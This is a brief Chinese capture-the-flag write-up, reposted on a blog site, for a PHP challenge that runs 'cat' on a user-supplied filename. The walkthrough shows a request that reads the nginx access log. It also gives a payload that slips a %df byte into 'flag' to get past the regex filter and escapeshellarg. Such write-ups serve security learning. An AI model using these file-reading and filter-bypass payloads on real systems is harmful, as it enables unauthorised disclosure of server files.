admin 管理员组

文章数量: 1087678

cat flag

cat flag

<?php
​
if (isset($_GET['cmd'])) {$cmd = $_GET['cmd'];if (!preg_match('/flag/i',$cmd)){$cmd = escapeshellarg($cmd);system('cat ' . $cmd);}
} else {highlight_file(__FILE__);
}
?>

题目给了一点点代码,对cmd参数进行匹配,不能存在flag字符串。

执行cat命令,查看他的日志;

?cmd=/var/log/nginx/access.log

发现this_is_final_flag_e2a457126032b42d.php文件,也就是我们要查看这个文件,但是这里存在flag字符串,所以没法直接输入。

由于escapeshellarg函数会忽略ascll大于127的字符,所以我们构造payload

?cmd=this_is_final_fla%dfg_e2a457126032b42d.php

由于%df的存在通过了preg_match函数,然后经过escapeshellarg函数的时候%df又被忽略,这样就成功绕过了。

本文标签: cat flag

版权声明:本文标题:cat flag 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1687418123a100326.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。